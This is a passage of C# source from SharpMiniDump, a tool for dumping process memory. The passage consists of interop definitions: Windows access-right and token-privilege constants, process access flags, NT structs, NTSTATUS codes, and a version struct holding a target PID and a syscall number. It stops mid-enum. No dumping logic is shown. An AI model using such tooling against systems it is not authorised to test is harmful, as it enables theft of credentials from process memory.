public delegate int PssCaptureSnapshot(IntPtr ProcessHandle, PSS_CAPTURE_FLAGS CaptureFlags, int ThreadContextFlags, ref IntPtr SnapshotHandle);
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate bool MyMiniDumpWriteDumpCallback(IntPtr CallbackParam, IntPtr CallbackInput, IntPtr CallbackOutput);
}
}
}
================================================
FILE: SharpMiniDump/Natives.cs
================================================
//
// Author: B4rtik (@b4rtik)
// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump)
// License: BSD 3-Clause
//
using System;
using System.Runtime.InteropServices;
namespace SharpMiniDump
{
class Natives
{
public const int FILE_READ_DATA = 0x0001; // file & pipe
public const int FILE_LIST_DIRECTORY = 0x0001; // directory
public const int FILE_WRITE_DATA = 0x0002; // file & pipe
public const int FILE_ADD_FILE = 0x0002; // directory
public const int FILE_APPEND_DATA = 0x0004; // file
public const int FILE_ADD_SUBDIRECTORY = 0x0004; // directory
public const int FILE_CREATE_PIPE_INSTANCE = 0x0004; // named pipe
public const int FILE_READ_EA = 0x0008; // file & directory
public const int FILE_WRITE_EA = 0x0010; // file & directory
public const int FILE_EXECUTE = 0x0020; // file
public const int FILE_TRAVERSE = 0x0020; // directory
public const int FILE_DELETE_CHILD = 0x0040; // directory
public const int FILE_READ_ATTRIBUTES = 0x0080; // all
public const int FILE_WRITE_ATTRIBUTES = 0x0100; // all
public const int FILE_OVERWRITE_IF = 0x00000005;
public const int FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020;
public const long READ_CONTROL = 0x00020000;
public const long SYNCHRONIZE = 0x00100000;
public const long STANDARD_RIGHTS_WRITE = READ_CONTROL;
public const long STANDARD_RIGHTS_EXECUTE = READ_CONTROL;
public const long STANDARD_RIGHTS_ALL = 0x001F0000;
public const long SPECIFIC_RIGHTS_ALL = 0x0000FFFF;
public const long FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1FF;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY = 0x0008;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_PRIVILEGES = 0x0020;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY);
public const UInt32 SE_PRIVILEGE_ENABLED = 0x2;
public const long FILE_GENERIC_READ = STANDARD_RIGHTS_READ |
FILE_READ_DATA |
FILE_READ_ATTRIBUTES |
FILE_READ_EA |
SYNCHRONIZE;
public const long FILE_GENERIC_WRITE = STANDARD_RIGHTS_WRITE |
FILE_WRITE_DATA |
FILE_WRITE_ATTRIBUTES |
FILE_WRITE_EA |
FILE_APPEND_DATA |
SYNCHRONIZE;
public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE |
FILE_READ_ATTRIBUTES |
FILE_EXECUTE |
SYNCHRONIZE;
public const int FILE_SHARE_READ = 0x00000001;
public const int FILE_SHARE_WRITE = 0x00000002;
public const int FILE_SHARE_DELETE = 0x00000004;
public const int FILE_ATTRIBUTE_READONLY = 0x00000001;
public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002;
public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004;
public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010;
public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020;
public const int FILE_ATTRIBUTE_DEVICE = 0x00000040;
public const int FILE_ATTRIBUTE_NORMAL = 0x00000080;
public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100;
public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200;
public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400;
public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800;
public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000;
public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000;
public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000;
public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001;
public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002;
public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004;
public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008;
public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010;
public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020;
public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040;
public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100;
public const int FILE_ACTION_ADDED = 0x00000001;
public const int FILE_ACTION_REMOVED = 0x00000002;
public const int FILE_ACTION_MODIFIED = 0x00000003;
public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004;
public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005;
public const int MAILSLOT_NO_MESSAGE = -1;
public const int MAILSLOT_WAIT_FOREVER = -1;
public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001;
public const int FILE_CASE_PRESERVED_NAMES = 0x00000002;
public const int FILE_UNICODE_ON_DISK = 0x00000004;
public const int FILE_PERSISTENT_ACLS = 0x00000008;
public const int FILE_FILE_COMPRESSION = 0x00000010;
public const int FILE_VOLUME_QUOTAS = 0x00000020;
public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040;
public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080;
public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100;
public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000;
public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000;
public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000;
public const int FILE_NAMED_STREAMS = 0x00040000;
public const int FILE_READ_ONLY_VOLUME = 0x00080000;
public const int CREATE_ALWAYS = 2;
public struct WIN_VER_INFO
{
public string chOSMajorMinor;
public long dwBuildNumber;
public UNICODE_STRING ProcName;
public IntPtr hTargetPID;
public string lpApiCall;
public int SystemCall;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct OSVERSIONINFOEXW
{
public int dwOSVersionInfoSize;
public int dwMajorVersion;
public int dwMinorVersion;
public int dwBuildNumber;
public int dwPlatformId;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
public string szCSDVersion;
public UInt16 wServicePackMajor;
public UInt16 wServicePackMinor;
public UInt16 wSuiteMask;
public byte wProductType;
public byte wReserved;
}
[StructLayout(LayoutKind.Sequential)]
public struct LARGE_INTEGER
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct SYSTEM_PROCESSES
{
public int NextEntryOffset;
public int NumberOfThreads;
public LARGE_INTEGER WorkingSetPrivateSize;
public uint HardFaultCount;
public uint NumberOfThreadsHighWatermark;
public ulong CycleTime;
public long CreateTime;
public long UserTime;
public long KernelTime;
public UNICODE_STRING ImageName;
public int BasePriority;
public IntPtr UniqueProcessId;
public IntPtr InheritedFromUniqueProcessId;
public int HandleCount;
public int SessionId;
public IntPtr UniqueProcessKey;
public IntPtr PeakVirtualSize;
public IntPtr VirtualSize;
public uint PageFaultCount;
public IntPtr PeakWorkingSetSize;
public IntPtr WorkingSetSize;
public IntPtr QuotaPeakPagedPoolUsage;
public IntPtr QuotaPagedPoolUsage;
public IntPtr QuotaPeakNonPagedPoolUsage;
public IntPtr QuotaNonPagedPoolUsage;
public IntPtr PagefileUsage;
public IntPtr PeakPagefileUsage;
public IntPtr PrivatePageCount;
public LARGE_INTEGER ReadOperationCount;
public LARGE_INTEGER WriteOperationCount;
public LARGE_INTEGER OtherOperationCount;
public LARGE_INTEGER ReadTransferCount;
public LARGE_INTEGER WriteTransferCount;
public LARGE_INTEGER OtherTransferCount;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
{
public LUID Luid;
public UInt32 Attributes;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct TOKEN_PRIVILEGES
{
public UInt32 PrivilegeCount;
public LUID_AND_ATTRIBUTES Privileges;
}
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
DuplicateHandle = 0x00000040,
CreateProcess = 0x000000080,
SetQuota = 0x00000100,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
QueryLimitedInformation = 0x00001000,
Synchronize = 0x00100000
}
[StructLayout(LayoutKind.Sequential, Pack = 0)]
public struct IO_STATUS_BLOCK
{
public uint status;
public IntPtr information;
}
public struct CLIENT_ID
{
public IntPtr UniqueProcess;
public IntPtr UniqueThread;
}
[StructLayout(LayoutKind.Sequential)]
public struct OBJECT_ATTRIBUTES
{
public ulong Length;
public IntPtr RootDirectory;
public IntPtr ObjectName;
public ulong Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
public enum NTSTATUS : uint
{
// Success
Success = 0x00000000,
Wait0 = 0x00000000,
Wait1 = 0x00000001,
Wait2 = 0x00000002,
Wait3 = 0x00000003,
Wait63 = 0x0000003f,
Abandoned = 0x00000080,
AbandonedWait0 = 0x00000080,
AbandonedWait1 = 0x00000081,
AbandonedWait2 = 0x00000082,
AbandonedWait3 = 0x00000083,
AbandonedWait63 = 0x000000bf,
UserApc = 0x000000c0,
KernelApc = 0x00000100,
Alerted = 0x00000101,
Timeout = 0x00000102,
Pending = 0x00000103,
Reparse = 0x00000104,
MoreEntries = 0x00000105,
NotAllAssigned = 0x00000106,
SomeNotMapped = 0x00000107,
OpLockBreakInProgress = 0x00000108,
VolumeMounted = 0x00000109,
RxActCommitted = 0x0000010a,
NotifyCleanup = 0x0000010b,
NotifyEnumDir = 0x0000010c,
NoQuotasForAccount = 0x0000010d,
PrimaryTransportConnectFailed = 0x0000010e,
PageFaultTransition = 0x00000110,
PageFaultDemandZero = 0x00000111,
PageFaultCopyOnWrite = 0x00000112,
PageFaultGuardPage = 0x00000113,
PageFaultPagingFile = 0x00000114,
CrashDump = 0x00000116,
ReparseObject = 0x00000118,
NothingToTerminate = 0x00000122,
ProcessNotInJob = 0x00000123,
ProcessInJob = 0x00000124,
ProcessCloned = 0x00000129,
FileLockedWithOnlyReaders = 0x0000012a,
FileLockedWithWriters = 0x0000012b,
// Informational
Informational = 0x40000000,
ObjectNameExists = 0x40000000,
ThreadWasSuspended = 0x40000001,
WorkingSetLimitRange = 0x40000002,
ImageNotAtBase = 0x40000003,
RegistryRecovered = 0x40000009,
// Warning
Warning = 0x80000000,
GuardPageViolation = 0x80000001,
DatatypeMisalignment = 0x80000002,
Breakpoint = 0x80000003,
SingleStep = 0x80000004,
BufferOverflow = 0x80000005,
NoMoreFiles = 0x80000006,
HandlesClosed = 0x8000000a,
PartialCopy = 0x8000000d,
DeviceBusy = 0x80000011,
InvalidEaName = 0x80000013,
EaListInconsistent = 0x80000014,
NoMoreEntries = 0x8000001a,
LongJump = 0x80000026,
DllMightBeInsecure = 0x8000002b,
// Error
Error = 0xc0000000,
Unsuccessful = 0xc0000001,
NotImplemented = 0xc0000002,
InvalidInfoClass = 0xc0000003,
InfoLengthMismatch = 0xc0000004,
AccessViolation = 0xc0000005,
InPageError = 0xc0000006,
PagefileQuota = 0xc0000007,
InvalidHandle = 0xc0000008,
BadInitialStack = 0xc0000009,
BadInitialPc = 0xc000000a,
InvalidCid = 0xc000000b,
TimerNotCanceled = 0xc000000c,
InvalidParameter = 0xc000000d,
NoSuchDevice = 0xc000000e,
NoSuchFile = 0xc000000f,
InvalidDeviceRequest = 0xc0000010,
EndOfFile = 0xc0000011,
WrongVolume = 0xc0000012,
NoMediaInDevice = 0xc0000013,
NoMemory = 0xc0000017,
ConflictingAddresses = 0xc0000018,
NotMappedView = 0xc0000019,
UnableToFreeVm = 0xc000001a,
UnableToDeleteSection = 0xc000001b,
IllegalInstruction = 0xc000001d,
AlreadyCommitted = 0xc0000021,
AccessDenied = 0xc0000022,
BufferTooSmall = 0xc0000023,
ObjectTypeMismatch = 0xc0000024,
NonContinuableException = 0xc0000025,
BadStack = 0xc0000028,
NotLocked = 0xc000002a,
NotCommitted = 0xc000002d,
InvalidParameterMix = 0xc0000030,
ObjectNameInvalid = 0xc0000033,
ObjectNameNotFound = 0xc0000034,
ObjectNameCollision = 0xc0000035,
ObjectPathInvalid = 0xc0000039,
ObjectPathNotFound = 0xc000003a,
ObjectPathSyntaxBad = 0xc000003b,
DataOverrun = 0xc000003c,
DataLate = 0xc000003d,
DataError = 0xc000003e,
CrcError = 0xc000003f,
SectionTooBig = 0xc0000040,
PortConnectionRefused = 0xc0000041,
InvalidPortHandle = 0xc0000042,
SharingViolation = 0xc0000043,
QuotaExceeded = 0xc0000044,
InvalidPageProtection = 0xc0000045,
MutantNotOwned = 0xc0000046,
SemaphoreLimitExceeded = 0xc0000047,
PortAlreadySet = 0xc0000048,
SectionNotImage = 0xc0000049,
SuspendCountExceeded = 0xc000004a,
ThreadIsTerminating = 0xc000004b,
BadWorkingSetLimit = 0xc000004c,
IncompatibleFileMap = 0xc000004d,
SectionProtection = 0xc000004e,
EasNotSupported = 0xc000004f,
EaTooLarge = 0xc0000050,
NonExistentEaEntry = 0xc0000051,
NoEasOnFile = 0xc0000052,
EaCorruptError = 0xc0000053,
FileLockConflict = 0xc0000054,
LockNotGranted = 0xc0000055,
DeletePending = 0xc0000056,
CtlFileNotSupported = 0xc0000057,
UnknownRevision = 0xc0000058,
RevisionMismatch = 0xc0000059,
InvalidOwner = 0xc000005a,
InvalidPrimaryGroup = 0xc000005b,
NoImpersonationToken = 0xc000005c,
CantDisableMandatory = 0xc000005d,
NoLogonServers = 0xc000005e,
NoSuchLogonSession = 0xc000005f,
NoSuchPrivilege = 0xc0000060,
PrivilegeNotHeld = 0xc0000061,
InvalidAccountName = 0xc0000062,
UserExists = 0xc0000063,
NoSuchUser = 0xc0000064,
GroupExists = 0xc0000065,
NoSuchGroup = 0xc0000066,
MemberInGroup = 0xc0000067,
MemberNotInGroup = 0xc0000068,
LastAdmin = 0xc0000069,
WrongPassword = 0xc000006a,
IllFormedPassword = 0xc000006b,
PasswordRestriction = 0xc000006c,
LogonFailure = 0xc000006d,
AccountRestriction = 0xc000006e,
InvalidLogonHours = 0xc000006f,
InvalidWorkstation = 0xc0000070,
PasswordExpired = 0xc0000071,
AccountDisabled = 0xc0000072,
NoneMapped = 0xc0000073,
TooManyLuidsRequested = 0xc0000074,
LuidsExhausted = 0xc0000075,
InvalidSubAuthority = 0xc0000076,
InvalidAcl = 0xc0000077,
InvalidSid = 0xc0000078,
InvalidSecurityDescr = 0xc0000079,
ProcedureNotFound = 0xc000007a,
InvalidImageFormat = 0xc000007b,
NoToken = 0xc000007c,
BadInheritanceAcl = 0xc000007d,
RangeNotLocked = 0xc000007e,
DiskFull = 0xc000007f,
ServerDisabled = 0xc0000080,
ServerNotDisabled = 0xc0000081,
TooManyGuidsRequested = 0xc0000082,
GuidsExhausted = 0xc0000083,
InvalidIdAuthority = 0xc0000084,
AgentsExhausted = 0xc0000085,
InvalidVolumeLabel = 0xc0000086,
SectionNotExtended = 0xc0000087,
NotMappedData = 0xc0000088,
ResourceDataNotFound = 0xc0000089,
ResourceTypeNotFound = 0xc000008a,
ResourceNameNotFound = 0xc000008b,
ArrayBoundsExceeded = 0xc000008c,
FloatDenormalOperand = 0xc000008d,
FloatDivideByZero = 0xc000008e,
FloatInexactResult = 0xc000008f,
FloatInvalidOperation = 0xc0000090,
FloatOverflow = 0xc0000091,
FloatStackCheck = 0xc0000092,
FloatUnderflow = 0xc0000093,
IntegerDivideByZero = 0xc0000094,
IntegerOverflow = 0xc0000095,
PrivilegedInstruction = 0xc0000096,
TooManyPagingFiles = 0xc0000097,
FileInvalid = 0xc0000098,
InstanceNotAvailable = 0xc00000ab,
PipeNotAvailable = 0xc00000ac,
InvalidPipeState = 0xc00000ad,
PipeBusy = 0xc00000ae,
IllegalFunction = 0xc00000af,
PipeDisconnected = 0xc00000b0,
PipeClosing = 0xc00000b1,
PipeConnected = 0xc00000b2,
PipeListening = 0xc00000b3,
InvalidReadMode = 0xc00000b4,
IoTimeout = 0xc00000b5,
FileForcedClosed = 0xc00000b6,
ProfilingNotStarted = 0xc00000b7,
ProfilingNotStopped = 0xc00000b8,
NotSameDevice = 0xc00000d4,
FileRenamed = 0xc00000d5,
CantWait = 0xc00000d8,
PipeEmpty = 0xc00000d9,
CantTerminateSelf = 0xc00000db,
InternalError = 0xc00000e5,
InvalidParameter1 = 0xc00000ef,
InvalidParameter2 = 0xc00000f0,
InvalidParameter3 = 0xc00000f1,
InvalidParameter4 = 0xc00000f2,
InvalidParameter5 = 0xc00000f3,
InvalidParameter6 = 0xc00000f4,
InvalidParameter7 = 0xc00000f5,
InvalidParameter8 = 0xc00000f6,
InvalidParameter9 = 0xc00000f7,
InvalidParameter10 = 0xc00000f8,
InvalidParameter11 = 0xc00000f9,
InvalidParameter12 = 0xc00000fa,
MappedFileSizeZero = 0xc000011e,
TooManyOpenedFiles = 0xc000011f,
Cancelled = 0xc0000120,
CannotDelete = 0xc0000121,
InvalidComputerName = 0xc0000122,
FileDeleted = 0xc0000123,
SpecialAccount = 0xc0000124,
SpecialGroup = 0xc0000125,
SpecialUser = 0xc0000126,
MembersPrimaryGroup = 0xc0000127,
FileClosed = 0xc0000128,
TooManyThreads = 0xc0000129,
ThreadNotInProcess = 0xc000012a,
TokenAlreadyInUse = 0xc000012b,
PagefileQuotaExceeded = 0xc000012c,
CommitmentLimit = 0xc000012d,
InvalidImageLeFormat = 0xc000012e,
InvalidImageNotMz = 0xc000012f,
InvalidImageProtect = 0xc0000130,
InvalidImageWin16 = 0xc0000131,
LogonServer = 0xc0000132,
DifferenceAtDc = 0xc0000133,
SynchronizationRequired = 0xc0000134,
DllNotFound = 0xc0000135,
IoPrivilegeFailed = 0xc0000137,
OrdinalNotFound = 0xc0000138,
EntryPointNotFound = 0xc0000139,
ControlCExit = 0xc000013a,
PortNotSet = 0xc0000353,
DebuggerInactive = 0xc0000354,
CallbackBypass = 0xc0000503,
PortClosed = 0xc0000700,
MessageLost = 0xc0000701,
InvalidMessage = 0xc0000702,
RequestCanceled = 0xc0000703,
RecursiveDispatch = 0xc0000704,
LpcReceiveBufferExpected = 0xc0000705,
LpcInvalidConnectionUsage = 0xc0000706,
LpcRequestsNotAllowed = 0xc0000707,
ResourceInUse = 0xc0000708,
ProcessIsProtected = 0xc0000712,
VolumeDirty = 0xc0000806,
FileCheckedOut = 0xc0000901,
CheckOutRequired = 0xc0000902,
BadFileType = 0xc0000903,
FileTooLarge = 0xc0000904,
FormsAuthRequired = 0xc0000905,
VirusInfected = 0xc0000906,
VirusDeleted = 0xc0000907,
TransactionalConflict = 0xc0190001,
InvalidTransaction = 0xc0190002,
TransactionNotActive = 0xc0190003,
TmInitializationFailed = 0xc0190004,
RmNotActive = 0xc0190005,
RmMetadataCorrupt = 0xc0190006,
TransactionNotJoined = 0xc0190007,
DirectoryNotRm = 0xc0190008,
CouldNotResizeLog = 0xc0190009,
TransactionsUnsupportedRemote = 0xc019000a,
LogResizeInvalidSize = 0xc019000b,
RemoteFileVersionMismatch = 0xc019000c,
CrmProtocolAlreadyExists = 0xc019000f,
TransactionPropagationFailed = 0xc0190010,
CrmProtocolNotFound = 0xc0190011,
TransactionSuperiorExists = 0xc0190012,
TransactionRequestNotValid = 0xc0190013,
TransactionNotRequested = 0xc0190014,
TransactionAlreadyAborted = 0xc0190015,
TransactionAlreadyCommitted = 0xc0190016,
TransactionInvalidMarshallBuffer = 0xc0190017,
CurrentTransactionNotValid = 0xc0190018,
LogGrowthFailed = 0xc0190019,
ObjectNoLongerExists = 0xc0190021,
StreamMiniversionNotFound = 0xc0190022,
StreamMiniversionNotValid = 0xc0190023,
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
CantOpenMiniversionWithModifyIntent = 0xc0190025,
CantCreateMoreStreamMiniversions = 0xc0190026,
HandleNoLongerValid = 0xc0190028,
NoTxfMetadata = 0xc0190029,
LogCorruptionDetected = 0xc0190030,
CantRecoverWithHandleOpen = 0xc0190031,
RmDisconnected = 0xc0190032,
EnlistmentNotSuperior = 0xc0190033,
RecoveryNotNeeded = 0xc0190034,
RmAlreadyStarted = 0xc0190035,
FileIdentityNotPersistent = 0xc0190036,
CantBreakTransactionalDependency = 0xc0190037,
CantCrossRmBoundary = 0xc0190038,
TxfDirNotEmpty = 0xc0190039,
IndoubtTransactionsExist = 0xc019003a,
TmVolatile = 0xc019003b,
RollbackTimerExpired = 0xc019003c,
TxfAttributeCorrupt = 0xc019003d,
EfsNotAllowedInTransaction = 0xc019003e,
TransactionalOpenNotAllowed = 0xc019003f,
TransactedMappingUnsupportedRemote = 0xc0190040,
TxfMetadataAlreadyPresent = 0xc0190041,
TransactionScopeCallbacksNotSet = 0xc0190042,
TransactionRequiredPromotion = 0xc0190043,
CannotExecuteFileInTransaction = 0xc0190044,
TransactionsNotFrozen = 0xc0190045,
MaximumNtStatus = 0xffffffff
}
public enum SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0x0000,
SystemProcessorInformation = 0x0001,
SystemPerformanceInformation = 0x0002,
SystemTimeOfDayInformation = 0x0003,
SystemPathInformation = 0x0004,
SystemProcessInformation = 0x0005,
SystemCallCountInformation = 0x0006,
SystemDeviceInformation = 0x0007,
SystemProcessorPerformanceInformation = 0x0008,
SystemFlagsInformation = 0x0009,
SystemCallTimeInformation = 0x000A,
SystemModuleInformation = 0x000B,
SystemLocksInformation = 0x000C,
SystemStackTraceInformation = 0x000D,
SystemPagedPoolInformation = 0x000E,
SystemNonPagedPoolInformation = 0x000F,
SystemHandleInformation = 0x0010,
SystemObjectInformation = 0x0011,
SystemPageFileInformation = 0x0012,
SystemVdmInstemulInformation = 0x0013,
SystemVdmBopInformation = 0x0014,
SystemFileCacheInformation = 0x0015,
SystemPoolTagInformation = 0x0016,
SystemInterruptInformation = 0x0017,
SystemDpcBehaviorInformation = 0x0018,
SystemFullMemoryInformation = 0x0019,
SystemLoadGdiDriverInformation = 0x001A,
SystemUnloadGdiDriverInformation = 0x001B,
SystemTimeAdjustmentInformation = 0x001C,
SystemSummaryMemoryInformation = 0x001D,
SystemMirrorMemoryInformation = 0x001E,
SystemPerformanceTraceInformation = 0x001F,
SystemCrashDumpInformation = 0x0020,
SystemExceptionInformation = 0x0021,
SystemCrashDumpStateInformation = 0x0022,
SystemKernelDebuggerInformation = 0x0023,
SystemContextSwitchInformation = 0x0024,
SystemRegistryQuotaInformation = 0x0025,
SystemExtendServiceTableInformation = 0x0026,
SystemPrioritySeperation = 0x0027,
SystemVerifierAddDriverInformation = 0x0028,
SystemVerifierRemoveDriverInformation = 0x0029,
SystemProcessorIdleInformation = 0x002A,
SystemLegacyDriverInformation = 0x002B,
SystemCurrentTimeZoneInformation = 0x002C,
SystemLookasideInformation = 0x002D,
SystemTimeSlipNotification = 0x002E,
SystemSessionCreate = 0x002F,
SystemSessionDetach = 0x0030,
SystemSessionInformation = 0x0031,
SystemRangeStartInformation = 0x0032,
SystemVerifierInformation = 0x0033,
SystemVerifierThunkExtend = 0x0034,
SystemSessionProcessInformation = 0x0035,
SystemLoadGdiDriverInSystemSpace = 0x0036,
SystemNumaProcessorMap = 0x0037,
SystemPrefetcherInformation = 0x0038,
SystemExtendedProcessInformation = 0x0039,
SystemRecommendedSharedDataAlignment = 0x003A,
SystemComPlusPackage = 0x003B,
SystemNumaAvailableMemory = 0x003C,
SystemProcessorPowerInformation = 0x003D,
SystemEmulationBasicInformation = 0x003E,
SystemEmulationProcessorInformation = 0x003F,
SystemExtendedHandleInformation = 0x0040,
SystemLostDelayedWriteInformation = 0x0041,
SystemBigPoolInformation = 0x0042,
SystemSessionPoolTagInformation = 0x0043,
SystemSessionMappedViewInformation = 0x0044,
SystemHotpatchInformation = 0x0045,
SystemObjectSecurityMode = 0x0046,
SystemWatchdogTimerHandler = 0x0047,
SystemWatchdogTimerInformation = 0x0048,
SystemLogicalProcessorInformation = 0x0049,
SystemWow64SharedInformationObsolete = 0x004A,
SystemRegisterFirmwareTableInformationHandler = 0x004B,
SystemFirmwareTableInformation = 0x004C,
SystemModuleInformationEx = 0x004D,
SystemVerifierTriageInformation = 0x004E,
SystemSuperfetchInformation = 0x004F,
SystemMemoryListInformation = 0x0050,
SystemFileCacheInformationEx = 0x0051,
SystemThreadPriorityClientIdInformation = 0x0052,
SystemProcessorIdleCycleTimeInformation = 0x0053,
SystemVerifierCancellationInformation = 0x0054,
SystemProcessorPowerInformationEx = 0x0055,
SystemRefTraceInformation = 0x0056,
SystemSpecialPoolInformation = 0x0057,
SystemProcessIdInformation = 0x0058,
SystemErrorPortInformation = 0x0059,
SystemBootEnvironmentInformation = 0x005A,
SystemHypervisorInformation = 0x005B,
SystemVerifierInformationEx = 0x005C,
SystemTimeZoneInformation = 0x005D,
SystemImageFileExecutionOptionsInformation = 0x005E,
SystemCoverageInformation = 0x005F,
SystemPrefetchPatchInformation = 0x0060,
SystemVerifierFaultsInformation = 0x0061,
SystemSystemPartitionInformation = 0x0062,
SystemSystemDiskInformation = 0x0063,
SystemProcessorPerformanceDistribution = 0x0064,
SystemNumaProximityNodeInformation = 0x0065,
SystemDynamicTimeZoneInformation = 0x0066,
SystemCodeIntegrityInformation = 0x0067,
SystemProcessorMicrocodeUpdateInformation = 0x0068,
SystemProcessorBrandString = 0x0069,
SystemVirtualAddressInformation = 0x006A,
SystemLogicalProcessorAndGroupInformation = 0x006B,
SystemProcessorCycleTimeInformation = 0x006C,
SystemStoreInformation = 0x006D,
SystemRegistryAppendString = 0x006E,
SystemAitSamplingValue = 0x006F,
SystemVhdBootInformation = 0x0070,
SystemCpuQuotaInformation = 0x0071,
SystemNativeBasicInformation = 0x0072,
SystemErrorPortTimeouts = 0x0073,
SystemLowPriorityIoInformation = 0x0074,
SystemBootEntropyInformation = 0x0075,
SystemVerifierCountersInformation = 0x0076,
SystemPagedPoolInformationEx = 0x0077,
SystemSystemPtesInformationEx = 0x0078,
SystemNodeDistanceInformation = 0x0079,
SystemAcpiAuditInformation = 0x007A,
SystemBasicPerformanceInformation = 0x007B,
SystemQueryPerformanceCounterInformation = 0x007C,
SystemSessionBigPoolInformation = 0x007D,
SystemBootGraphicsInformation = 0x007E,
SystemScrubPhysicalMemoryInformation = 0x007F,
SystemBadPageInformation = 0x0080,
SystemProcessorProfileControlArea = 0x0081,
SystemCombinePhysicalMemoryInformation = 0x0082,
SystemEntropyInterruptTimingInformation = 0x0083,
SystemConsoleInformation = 0x0084,
SystemPlatformBinaryInformation = 0x0085,
SystemThrottleNotificationInformation = 0x0086,
SystemHypervisorProcessorCountInformation = 0x0087,
SystemDeviceDataInformation = 0x0088,
SystemDeviceDataEnumerationInformation = 0x0089,
SystemMemoryTopologyInformation = 0x008A,
SystemMemoryChannelInformation = 0x008B,
SystemBootLogoInformation = 0x008C,
SystemProcessorPerformanceInformationEx = 0x008D,
SystemSpare0 = 0x008E,
SystemSecureBootPolicyInformation = 0x008F,
SystemPageFileInformationEx = 0x0090,
SystemSecureBootInformation = 0x0091,
SystemEntropyInterruptTimingRawInformation = 0x0092,
SystemPortableWorkspaceEfiLauncherInformation = 0x0093,
SystemFullProcessInformation = 0x0094,
MaxSystemInfoClass = 0x0095
}
public struct TOKEN_ELEVATION {
public int TokenIsElevated;
}
public enum TOKEN_INFORMATION_CLASS
{
TokenUser = 1,
TokenGroups,
TokenPrivileges,
TokenOwner,
TokenPrimaryGroup,
TokenDefaultDacl,
TokenSource,
TokenType,
TokenImpersonationLevel,
TokenStatistics,
TokenRestrictedSids,
TokenSessionId,
TokenGroupsAndPrivileges,
TokenSessionReference,
TokenSandBoxInert,
TokenAuditPolicy,
TokenOrigin,
TokenElevationType,
TokenLinkedToken,
TokenElevation,
TokenHasRestrictions,
TokenAccessInformation,
TokenVirtualizationAllowed,
TokenVirtualizationEnabled,
TokenIntegrityLevel,
TokenUIAccess,
TokenMandatoryPolicy,
TokenLogonSid,
TokenIsAppContainer,
TokenCapabilities,
TokenAppContainerSid,
TokenAppContainerNumber,
TokenUserClaimAttributes,
TokenDeviceClaimAttributes,
TokenRestrictedUserClaimAttributes,
TokenRestrictedDeviceClaimAttributes,
TokenDeviceGroups,
TokenRestrictedDeviceGroups,
